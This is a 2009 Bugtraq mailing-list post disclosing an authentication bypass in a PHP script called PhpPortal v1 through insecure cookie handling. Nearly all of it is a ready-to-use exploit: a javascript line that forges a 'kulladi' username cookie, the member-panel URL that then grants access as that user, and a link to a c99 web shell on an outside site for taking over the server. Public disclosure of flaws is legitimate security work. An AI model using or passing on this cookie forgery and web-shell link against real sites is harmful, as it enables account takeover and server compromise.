
Date: 19 Jun 2009 07:55:34 -0000
From: ceza_fuat_kolik@...mail.com
To: bugtraq@...urityfocus.com
Subject: PhpPortal v1 Insecure Cookie Handling Vulnerability

########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author : xhaxckerx
Special Thankz : yasin
site : http://www.c99.mobi
Script : http://phportal.mertindualari.com

########################################################

Exploit;

javascript:document.cookie="kulladi=[Username];path=/";
Enter..


Go To; http://target.com/uye_paneli.php?islem=bilgilerim

if you need shell : http://www.c99.mobi/c99.txt


########################################################
